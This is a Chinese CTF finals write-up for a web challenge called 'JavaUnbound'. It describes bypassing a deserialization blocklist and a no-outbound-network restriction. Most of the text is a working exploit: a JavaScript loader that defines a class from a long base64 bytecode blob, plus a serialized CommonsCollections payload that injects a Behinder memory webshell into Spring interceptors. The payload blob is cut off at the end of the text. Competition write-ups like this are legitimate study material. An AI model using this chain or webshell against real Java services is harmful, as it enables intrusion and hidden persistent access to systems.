# 2026 长城杯 决赛wp

#比赛wp #web #awd
Table of Contents

前言

第一次决赛,也是最后一次决赛。抱上了队里逆向手的大腿。

二等也算是把集训队传统延续下去了

WEB

JavaUnbound

审一下源码,直接传字节流就能反序列化,

而且给了很多依赖,cc3.2.1,aop,tomcat啥的都有

但是有两个限制

  1. ban掉了很多sink点的类,同时经典的二次反序列化的两条路RMIConnector和SignedObject都走不通

    image-20260428123144525

  2. spring安全策略限制了非本地的连接,也就是不能出网了

    image-20260428123242567

而这也就导致了作为替代的jndi sink点打不了。

这里本地场尝试也验证了这一点

image-20260428123730452

最后因为不出网无回显,选择用CCK3 + com.sun.org.apache.bcel.internal.util.ClassLoader 加载BCEL字节码

var classLoader = java.lang.Thread.currentThread().getContextClassLoader();
var clsString = classLoader.loadClass('java.lang.String');
var bytecodeBase64 = 'yv66vgAAADIBCgEATW9yZy9hcGFjaGUvY29sbGVjdGlvbnMvY295b3RlL01hcHBpbmdJdGVyYXRvcmIzMmQ4N2U4ZWUzMzRmMWU4NDFmOTkxZThmODI0NjJiBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADWdldFVybFBhdHRlcm4BABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAAi8qCAAHAQAMZ2V0Q2xhc3NOYW1lAQBub3JnLmFwYWNoZS5jb21tb21zLmJlYW51dGlscy5jb3lvdGUuanNvbkZvcm1hdFZpc2l0b3JzLkpzb25TdHJpbmdGb3JtYXRWaXNpdG9yMDYzNDQ4OTc1NDEyNDNkMWE3MjViN2Y2MjAzMjY0Y2IIAAoBAA9nZXRCYXNlNjRTdHJpbmcBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwANAQAQamF2YS9sYW5nL1N0cmluZwcADwEJ7Eg0c0lBQUFBQUFBQUFMMVhhWHNUMXhWK3J5UjdoS3lFUkFUdzBnWklBNUZrc0l3dHZDWUIyOWpZd1haU1JFd2RwOHRJdXJZRThveVlHZG00YlJLYXBrMjZiK21TN3VsR1dpZ2xLY2dRR2txWHB4LzZoL3IwUzlQM3pzakNpMXpuVXgvN21ibjMzSFBmYys1N2xqdjY1My9ldlFQZ01QNHVZSmpXWEVJdjZwbWNUR1RNK1hsejNrNmtwVzZVbkh6QnBtVEpkR1RpckcwYUk2WTFyenRUZVR2dm1KYWRlSXFpbEdQbGpiazFDKzFkbmNsa1QyLzNrZVRoam1SbjlyRGUzWEVrM1QzYjFkSGUyZEdWektRMUNJR2RaL1VGUFZIUWpibkVVRUczN1hGVHowcExnMStnVzdsakZ4WHVyS1hQeTBYVE9wZFlsT21FTGEyRmduUVNBL2FTa1JuVmpXeEJXbU9HSTYyTUxOS3Voam9CTVVmczZNeGdiSHlkZ1g2QndKQ1psUUxieC9PR25Dek5wNlYxV2s4WEtJbU1teG05TUtWYmVUV3ZDQU5PTG04TEZNZi92K3pRVDVFVzhNME1DalJrNVN4OWRmMFgyTTFqalkxdFBGZ1lEK0RCRUFLSUNOUS9uamZ5enBNQ3pkSDFlaDdEL2JFcEdzZ1FiWlAxTUI3Q1RvWFdLT0NQeHFiVXZGbk5Xd1MyRlMzcDhTNlE5UXhjcUVZbDV6akZ4Q2dmS1U5d1NwNHZTZHZwMzFMTkxwcUdMZnRYK2ZOMCtxek1PUDJ4NXdSMjNKTU9YMUJ4enB1R2hqMENtaTF0bXhPQnZadGJjRFhJcU45TW4xV0JkOEZVNEJJVGVwSHluWld0R1d1SkdaUVl5aGR6cElEZ2x1ZTh3R01mOEpRQ1FhdHlFb0d0cWFtY21aWnlYaDZySk54QWdNQjlLVWZQbktPemxhUU01YVNLMGlUTFl1ME9MOU1ZdlVObzJ3WWZFZ0w3UDVEbkdnNHpzSFBTR1hXUkJRNUVOOExHYWxucVJMSUJIVGpDUFBXOG10SUxKUmxHdCtkQmo4QUQ2M2RwNkNOUkdkTnc5THpCbEc1Wms2VTUzVW9wcDR5TVpPekRlQnhQaE5BUFpuT0kvcVZXNHYxSU5MWlZ4TU00aGdIbEhJdm93WHRCSDlYdEhMblVjRHlFWWJRRWNZQU1yOGtKRGFQTWxtS0prZStKYmd4SWpSemRLQXJqS1p4c3dCakdnNGdHc1kvMVZncmlHWGFVSXNzc2pGTWVQeW1CaC8vM01UUThTN2JvakVzc2M3RkdaR3A0eEpJOWc0ODFZQXJUUE12QWNDcUltVW9ocmN0MERSOW44TWp0bUdFN09ta1hpRzBhL2ZWVkVzWW44YWtRUGdGZFlNOGFCYnNvTTRtVXpGalNPU21YVXB4cFlNY0owdERna2lNWjkwQTBOak1ZaHNTc0N2Q2MxOXRxR0hhN1R6NkVMRmkrQWRYYWxPcVlwMm5MVE1uS08wc0pHbkZWQzVoWC9oaHJFczlqUlVQUmM2RFNTM2RFYS9WUkMzWUk1MEVqMjljdGFsZ1F1SDlsdjljcUJabzJvbFM3NkFVc2hiQ0lUNGNZNmthdndrNVZLcXg1WlZ2ZVRBeVdabWVsSmJQZUd2ZTlnQmRWNHI0a3NLdTJqb2JQdWMxR3o2cDdUT0NoYU0zcS9EeGVDZUZsZklHbTAxM0o0ekxqM24yN2FvVlhoZUpWdktZOC9SSTdVdFljeVJ0NmdaZUp1a2ZWNGxmd1ZVWHMxOExRRUZScTMyRGFHSEx4WHRxc2RhSmFDTi9DdHhVSjN5RVdDMXN2Mk9weXJ0WG93L2d1dnFlNC96Nkx2ZHJvYmVXTjZ6bFpxMC9ydHV4S3NxQnJYZTBMdXRXMTBzL1hYUmRjOXFVSlZiZWd5a2pEOWtwK3RLbWlieHQwVVlQNEJXM05tcFhPdW4rTEhyaVNNTC9DcjlYNWZ1TjFLSTlrSzRpMzJKdG5OcWhyK0oyWEJ4UFN5WmxaZ1dNMXJHemN0dHF1SldjTEpDemhJZENCSy9pOWN1QXFNM3BtSTY4YXJnazBiclpkd3p0a05XOHNtT2Q0NU40YWNha0JXVFBNMTNFamhEK2lURGd2WEVIY1pLN1pKYU50UG05bjJnWUhVc01yT1VoNjNoVUllM3BlWmdmeEo0WWsyZDZUNmVscWIrK1VIYjFwZVlRWWQ0ZzNrRkZSRE9JdU83VmxEMDBWc3lNWDhvdGpxWk5CL0JYN21Jb0JVQXQrUHRsWCtVVXIxQTNvdnJ2ZGR4MUh6Rm8rdDNIMkJQVjlmRytMdC9wYjd5eGp4elZPZkFqeFdVOFZvQmtOZk83eWxCREdmWUE3dWgvYnVTN1V4MUVGNnBrS1ZHTzhkUmxOOGNpZmIrQjBQUEtYRzJpUFIvNTJBNzF2VjVGRHJ0NGU3TWJlVmVpTlZmUkdTblpYMEpzcjZNUHVrWURkOFdWOGFHdndqeERpVVJjODdHMnJnQXQ4R0E5VGc1Qmlsa2ZVS0x2ZUdyK085bHZvOHVFZmVPdmVoSVBlTW82K2dkZGJiMkZJb0M5d0c4UFR5eGpwcTJ1cWk1eWdjTUtQTXh4T0hxd09uMjRLVk1hQnlFY0pjUG9XbnZNajh2eE5wUHZxbStycmJpTTdyY1JsNUNMUEwrTmNHZVp0K0tialpaVEsrTXd5UHR0VUh6OUQ1SXNDWlh6eEpyNWN4dGZMK0dZWnJ6ZlZsZkdETTVkUTF4ZndYd2xjNFVuMjRUS3Vra0svZSs0K2hnUjRqTklZLytKc21hMk03a0dNTXY2bkdYa2RDZVRRamhmNUcrY3l2MVd1VXVNYWtuZ0hYUzVQbytRaXhnYTVENDh3a0IxWUlvZVBNbHR5R0NLWCs4a1ZtYXFHNkRvTzBKWndSMUh1ODdtak9HMzZhVk5Gd2Y4dlhOV3dsejl0M3VCY1plVmVzczYyV21IL1dTTFdjZVVWTVI3NTVVMWNtamdZK2EyNGk4dGwvT0VnMzIrWHNUeDVpTFJFYmdYZXcrSzBQOUtmNHRJaFRzNVArK01jTDkvRm05Ny8rQ1Vjbll6Y2RrSElWRitnS2FBMnZyZDZZMU5nazUza3MvVWFmZkx4bkNQMDhRUnZuSXRWVmp0NFl2Qks5dUVvYStZWVdqQkF2VEZxRGxMek9DYVltQ25PWGlCL0Z5bDVHU2VyYkxhUW1SKzZqQVR4Skg2RUg2dVBISEtrWkFIdTdLeklUaEQvSi9ncDljZ0dmdVpXcVk5SVAzZExUTEVaZy85OUd2RnBZQXQ3RTRLOHZvOWVCQ3B6VGwzWnY3R2FiUHdYdXhabHp0TU9BQUE9CAARAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAATABQKABAAFQEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABgMABMAFwoABAAaAQAKZ2V0Q29udGV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAAcAB0KAAIAHgEADmdldEludGVyY2VwdG9yDAAgAB0KAAIAIQEADmFkZEludGVyY2VwdG9yAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWDAAjACQKAAIAJQEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwAnAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAKQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24HACsBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcALQEAEGphdmEvbGFuZy9UaHJlYWQHAC8BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsMADEAMgoAMAAzAQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwANQA2CgAwADcBADxvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LnJlcXVlc3QuUmVxdWVzdENvbnRleHRIb2xkZXIIADkBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHADsBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAA9AD4KADwAPwEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzCABBAQAMaW52b2tlTWV0aG9kAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAEMARAoAAgBFAQAKZ2V0UmVxdWVzdAgARwEACmdldFNlc3Npb24IAEkBABFnZXRTZXJ2bGV0Q29udGV4dAgASwEAQm9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQuc3VwcG9ydC5XZWJBcHBsaWNhdGlvbkNvbnRleHRVdGlscwgATQEAGGdldFdlYkFwcGxpY2F0aW9uQ29udGV4dAgATwEAD2phdmEvbGFuZy9DbGFzcwcAUQEAHGphdmF4LnNlcnZsZXQuU2VydmxldENvbnRleHQIAFMBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAEMAVQoAAgBWAQAxb3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuTGl2ZUJlYW5zVmlldwgAWAEAC25ld0luc3RhbmNlDABaAB0KAFIAWwEAE2FwcGxpY2F0aW9uQ29udGV4dHMIAF0BAAVnZXRGVgwAXwBECgACAGABABdqYXZhL3V0aWwvTGlua2VkSGFzaFNldAcAYgEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwwAZABlCgBjAGYBABJqYXZhL3V0aWwvSXRlcmF0b3IHAGgBAARuZXh0DABqAB0LAGkAawEANW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQuV2ViQXBwbGljYXRpb25Db250ZXh0CABtAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DABvAHAKAAQAcQEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWgwAcwB0CgBSAHUBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwB3DAAJAAYKAAIAeQwADAAGCgACAHsBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDAB9AH4KAAIAfwEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDACBAIIKAAIAgwEAC2RlZmluZUNsYXNzCACFAQACW0IHAIcBABFqYXZhL2xhbmcvSW50ZWdlcgcAiQEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAiwCMCQCKAI0BABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAI8AkAoAUgCRAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwCTAQANc2V0QWNjZXNzaWJsZQEABChaKVYMAJUAlgoAlACXAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMAJkAmgoAigCbAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DACdAJ4KAJQAnwEAB2dldEJlYW4IAKEBABxyZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nCACjAQATYWRhcHRlZEludGVyY2VwdG9ycwgApQEAE2phdmEvdXRpbC9BcnJheUxpc3QHAKcBAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoMAKkAqgoAqACrAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcggArQEAB2Zvck5hbWUMAK8APgoAUgCwAQAMZGVjb2RlQnVmZmVyCACyAQAJZ2V0TWV0aG9kDAC0AJAKAFIAtQEAEGphdmEudXRpbC5CYXNlNjQIALcBAApnZXREZWNvZGVyCAC5AQAGZGVjb2RlCAC7AQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HAL0KAL4AGgEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0HAMABAAUoW0IpVgwAEwDCCgDBAMMBAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQcAxQEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAEwDHCgDGAMgBAARyZWFkAQAFKFtCKUkMAMoAywoAxgDMAQAFd3JpdGUBAAcoW0JJSSlWDADOAM8KAL4A0AEAC3RvQnl0ZUFycmF5AQAEKClbQgwA0gDTCgC+ANQBAAVzZXRGVgEAOShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDspVgEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMANgA2QoAAgDaAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHANwBAANzZXQMAN4AJAoA3QDfCgDdAJcBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwA4gDjCgDdAOQBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAOYBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DADoAOkKAFIA6gEADWdldFN1cGVyY2xhc3MMAOwAcAoAUgDtCgDnABUBABJnZXREZWNsYXJlZE1ldGhvZHMBAB0oKVtMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwA8ADxCgBSAPIBAAdnZXROYW1lDAD0AAYKAJQA9QEABmVxdWFscwwA9wCqCgAQAPgBABFnZXRQYXJhbWV0ZXJUeXBlcwEAFCgpW0xqYXZhL2xhbmcvQ2xhc3M7DAD6APsKAJQA/AoALAAVAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAP8BAApnZXRNZXNzYWdlDAEBAAYKAC4BAgoBAAAVAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7BwEFAQAEQ29kZQEACkV4Y2VwdGlvbnMBAA1TdGFja01hcFRhYmxlACEAAgAEAAAAAAAOAAEABQAGAAEBBwAAAA8AAQABAAAAAxIIsAAAAAAAAQAJAAYAAQEHAAAADwABAAEAAAADEguwAAAAAAABAAwABgACAQcAAAAWAAMAAQAAAAq7ABBZEhK3ABawAAAAAAEIAAAABAABAA4AAQATABcAAgEHAAAAIQADAAMAAAAVKrcAGyq2AB9MKrcAIk0qKyy2ACaxAAAAAAEIAAAABAABABkAAQAcAB0AAgEHAAAA+gAHAAcAAACQuAA0tgA4TAFNKxI6tgBAEkK4AEZOLRJIuABGOgQZBBJKuABGOgUZBRJMuABGOgYrEk62AEASUAS9AFJZAysSVLYAQFMEvQAEWQMZBlO4AFdNpwAETizHADgrElm2AEC2AFwSXrgAYcAAY04ttgBnuQBsAQA6BCsSbrYAQBkEtgBytgB2mQAGGQRNpwAETiywAAIACQBRAFQAGQBZAIoAjQAZAAEBCQAAAEgABf8AVAADBwACBwA8BwAEAAEHABn8AAAHAAT/ADQABQcAAgcAPAcABAcAYwcABAAA/wACAAQHAAIHADwHAAQHAAQAAQcAGQABCAAAAAoABAAoACoALAAuAAIAIAAdAAIBBwAAAMoABgAHAAAAergANLYAOEwBTSsqtgB6tgBAtgBcTacAY04qtgB8uACAuACEOgQSPBKGBr0AUlkDEohTWQSyAI5TWQWyAI5TtgCSOgUZBQS2AJgZBSsGvQAEWQMZBFNZBAO4AJxTWQUZBL64AJxTtgCgwABSOgYZBrYAXE2nAAU6BCywAAIACQAVABgAGQAZAHMAdgB4AAEBCQAAAC4AA/8AGAADBwACBwA8BwAEAAEHABn/AF0ABAcAAgcAPAcABAcAGQABBwB4+gABAQgAAAAEAAEAGQABACMAJAABAQcAAABWAAcABQAAADArEqIEvQBSWQMSEFMEvQAEWQMSpFO4AFdOLRKmuABhwACoOgQZBCy2AKxXpwAETrEAAQAAACsALgAZAAEBCQAAAAwAAm4HABn8AAAHAAQACAB9AH4AAgEHAAAAigAGAAQAAABqEq64ALFMKxKzBL0AUlkDEhBTtgC2K7YAXAS9AARZAypTtgCgwACIwACIsE0SuLgAsUwrEroDvQBStgC2AQO9AAS2AKBOLbYAchK8BL0AUlkDEhBTtgC2LQS9AARZAypTtgCgwACIwACIsAABAAAAKgArABkAAQEJAAAABgABawcAGQEIAAAACgAEACgALAAqAC4ACQCBAIIAAgEHAAAAbAAEAAYAAAA+uwC+WbcAv0y7AMFZKrcAxE27AMZZLLcAyU4RAQC8CDoELRkEtgDNWTYFmwAPKxkEAxUFtgDRp//rK7YA1bAAAAABAQkAAAAcAAL/ACEABQcAiAcAvgcAwQcAxgcAiAAA/AAXAQEIAAAABAABAA4AIADWANcAAgEHAAAAFwADAAQAAAALKyy4ANsrLbYA4LEAAAAAAQgAAAAEAAEAGQAIAF8ARAACAQcAAAAdAAIAAwAAABEqK7gA200sBLYA4SwqtgDlsAAAAAABCAAAAAQAAQAZAAgA2ADZAAIBBwAAAE8AAwAEAAAAKCq2AHJNLMYAGSwrtgDrTi0EtgDhLbBOLLYA7k2n/+m7AOdZK7cA778AAQAJABUAFgDnAAEBCQAAAA0AA/wABQcAUlAHAOcIAQgAAAAEAAEA5wAoAEMARAACAQcAAAAaAAQAAgAAAA4qKwO9AFIDvQAEuABXsAAAAAABCAAAAAgAAwAsAC4AKgApAEMAVQACAQcAAAEjAAMACQAAAMoqwQBSmQAKKsAAUqcAByq2AHI6BAE6BRkEOgYZBccAZBkGxgBfLMcAQxkGtgDzOgcDNggVCBkHvqIALhkHFQgytgD2K7YA+ZkAGRkHFQgytgD9vpoADRkHFQgyOgWnAAmECAGn/9CnAAwZBisstgCSOgWn/6k6BxkGtgDuOgan/50ZBccADLsALFkrtwD+vxkFBLYAmCrBAFKZABoZBQEttgCgsDoHuwEAWRkHtgEDtwEEvxkFKi22AKCwOge7AQBZGQe2AQO3AQS/AAMAJQByAHUALACcAKMApAAuALMAugC7AC4AAQEJAAAALwAODkMHAFL+AAgHAFIHAJQHAFL9ABcHAQYBLAX5AAIIQgcALAsNVAcALg5HBwAuAQgAAAAIAAMALAAqAC4AAA==';
var bytecode;
try{
var clsBase64 = classLoader.loadClass('java.util.Base64');
var clsDecoder = classLoader.loadClass('java.util.Base64$Decoder');
var decoder = clsBase64.getMethod('getDecoder').invoke(clsBase64);
bytecode = clsDecoder.getMethod('decode', clsString).invoke(decoder, bytecodeBase64);
} catch (e) {
var datatypeConverterClz = classLoader.loadClass('javax.xml.bind.DatatypeConverter');
bytecode = datatypeConverterClz.getMethod('parseBase64Binary', clsString).invoke(datatypeConverterClz, bytecodeBase64);
}
var clsClassLoader = classLoader.loadClass('java.lang.ClassLoader');
var clsByteArray = (new java.lang.String('a').getBytes().getClass());
var clsInt = java.lang.Integer.TYPE;
var defineClass = clsClassLoader.getDeclaredMethod('defineClass', [clsByteArray, clsInt, clsInt]);
defineClass.setAccessible(true);
var clazz = defineClass.invoke(classLoader,bytecode,new java.lang.Integer(0),new java.lang.Integer(bytecode.length));
clazz.newInstance();

写入冰蝎内存马

使用java-chain生成payload

image-20260428124503057

exp.b64:

rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LPt2YXIgY2xhc3NMb2FkZXIgPSBqYXZhLmxhbmcuVGhyZWFkLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKTsKdmFyIGNsc1N0cmluZyA9IGNsYXNzTG9hZGVyLmxvYWRDbGFzcygnamF2YS5sYW5nLlN0cmluZycpOwp2YXIgYnl0ZWNvZGVCYXNlNjQgPSAneXY2NnZnQUFBRElCQ2dFQVRXOXlaeTloY0dGamFHVXZZMjlzYkdWamRHbHZibk12WTI5NWIzUmxMMDFoY0hCcGJtZEpkR1Z5WVhSdmNtSXpNbVE0TjJVNFpXVXpNelJtTVdVNE5ERm1PVGt4WlRobU9ESTBOakppQndBQkFRQVFhbUYyWVM5c1lXNW5MMDlpYW1WamRBY0FBd0VBRFdkbGRGVnliRkJoZEhSbGNtNEJBQlFvS1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUFpOHFDQUFIQVFBTVoyVjBRMnhoYzNOT1lXMWxBUUJ1YjNKbkxtRndZV05vWlM1amIyMXRiMjF6TG1KbFlXNTFkR2xzY3k1amIzbHZkR1V1YW5OdmJrWnZjbTFoZEZacGMybDBiM0p6TGtwemIyNVRkSEpwYm1kR2IzSnRZWFJXYVhOcGRHOXlNRFl6TkRRNE9UYzFOREV5TkROa01XRTNNalZpTjJZMk1qQXpNalkwWTJJSUFBb0JBQTluWlhSQ1lYTmxOalJUZEhKcGJtY0JBQk5xWVhaaEwybHZMMGxQUlhoalpYQjBhVzl1QndBTkFRQVFhbUYyWVM5c1lXNW5MMU4wY21sdVp3Y0FEd0VKN0VnMGMwbEJRVUZCUVVGQlFVRk1NVmhoV0hOVU1YaFdLM0o1VWpkb1MzbEZVa0ZVZHpCbldrbEJOVVpyYzBsM2RIWkRXVUl5T1dwWmQxaGFVMUpGZDJSd09IUkpkWEpaUlRodmVWbEhaRzAwWWxKTFlYQnJNalppSzIxVE4zVnNSMWRwWjJ4TFkyZFJSMnR4V0hCNEx6Wm9MM0l3VXpsUU0zcHpha05wTVhwdVZYZ3ZOMjFpYmpNelNGQm1ZeXMxTjJ4cWRqWTFNeTlsZGxGUVowMVFOSFZaU21wWFdFVkpkalp3YldOVVIxUk5LMWhzZWpOck5tdHdWelpWYmtoNlFuQnRWRXBrUjFScGNrY3dZVWsyV1RGeWVuUlVaVlIyZG0xS1lXUmxTWEZwYkVkUWJHcGlhekZES3pGa2JtTnNhMVF5THpOclpWUm9hbTFTYmpseVJHVXpXRVZyTTFRellqRmtTR1V5WkVkV2VrdFJNVU5KUjJSYUwxVkdVRlpJVVdwaWJrVlZSVWN6TjFoR1ZIb3djRXhuTVN0blZ6ZHNha1o0V0hWeVMxaFFlVEJZVkU5d1pGbHNUMjFGVEdFeVJtZHVVVk5CTDJGVGExSnVWbXBYZUVKWGJVOUhTVFl5VFV4T1MzVm9hbTlDVFZWbWN6Wk5lR2RpU0hsa1oxZzJRbmRLUTFwc1VVeGllQzlQUjI1RGVrNXdObFl4VjJzNFdFdEpiVTF0ZUcwNVRVdFdZbVZVVjNaRFFVNVBURzA0VEVaTlppOTJLM3BSVkRWRlZ6aE5NRTFEYWxKck5WTjRPV1JtTUZneVRURnFhbGt4ZEZCR1oxbEVLMFJDUlVGTFNVTk9VUzl1YW1aNWVuQk5RM3BrU0RGbGFEZEVMMkpGY0VkeloxRmlXbEF4VFVJM1ExUnZXRmRMVDBOUWVIRmlWWFpHYms1WGQxTXlSbE16Y0RoVE5sRTVVWGhqY1VWWmJEVjZha1o0UTJkbVMxVTVkMU53TkhaVFpIWndNekZNVGt4d2NVZE1ablJZSzJaT01DdHhlazFQVURKNE5YZFNNak5LVFU5WU1VSjRlbkIxUjJocU1FTnRhVEYwYlhoUFFuWmFkR0pqUkZoSmNVNDVUVzR4VjBKa09FWlZORUpKVkdWd1NIbHVXbGQwUjFkMVNrZGFVVmw1YUdSNmNFbEVaMngxWlRoM1IwMW1PRXBSUTFGaGRIbEZiMGQwY1dGdFkyMWFXbmxZYURaeVNrNTRRV2ROUWpsTFZXWlFia3RQZW14aFVVMDFZVk5MTUdsVVRGbDFNRTlNT1UxWmRsVk9iekozV1daRlowdzNVRFZFYmtkbk5IcHpTRkJUUjFoWFVrSlJOVVZPT0V4SFlXeHVjVkpNU1VKSVZHcERVRkJYT0cxMFNVeEtVbXhIZEN0a1FtbzRRVVEyTTJSd05rTk9Va2RrVG5jNVRIcENiRWMxV21zMlZUVXpWVzl3Y0RSNVRWcFBla1JsUW5oUWFFNUJVRnB1VDBrdmNWWlhOSFl4U1U1TVdsWjRUVTAwYUdkSWJFaEpkbTkzV0hSQ1NEbFlkRWhNYmxWalJIbEZXV0pSUldOWlFVMXlPR3RLUkdGUVRXeHRTMHByWlN0S1ltZDRTV3BTZW1STFFYSnFTMXA0YzNkQ2FrZG5OR2RIYzFrdk1WWm5jbWxIV0dGVlNYTnpjMnBHVFdWUWVXMUNhQzh2TTAxVVVUaFROMkp2YWtWemMyTTNSa2RhUjNBMGVFcEpPV2MwT0RGWlFYSlVVRTEyUVdORGNVbHRWVzlvY21OME1FUlNPVzQ0VFdwMGJVZEZOMDl0YTFocFJ6QmhMMlpXVmtWeldXNDRZV3RSVUdkR1pGbE5PR0ZDWW5OdlRUUnRWWHBHYWxOUFUyMVlWWEI0Y0ZsTlkwb3dkRVJuYTJsTldqa3dRVEJPYWsxWmFITlRjME4yUTJNeE9YUnhSMGhoTjFSNk5rVk1SbWtyUVdSWVlXeFBjVmx3TW01TVZFMXVTMDh3YzBwSGJrWldRelZvV0M5b2FISkZjemxxVWxWUVVtTTJSRk5UTTJSRllTOVdVa016V1VrMU1FVnFNamxqZEdGc1oxRjFTRGxzZGpsamNVSmFiekp2YkZNM05rRlZjMmhpUTBsVU5HTlpObXRoZG5kc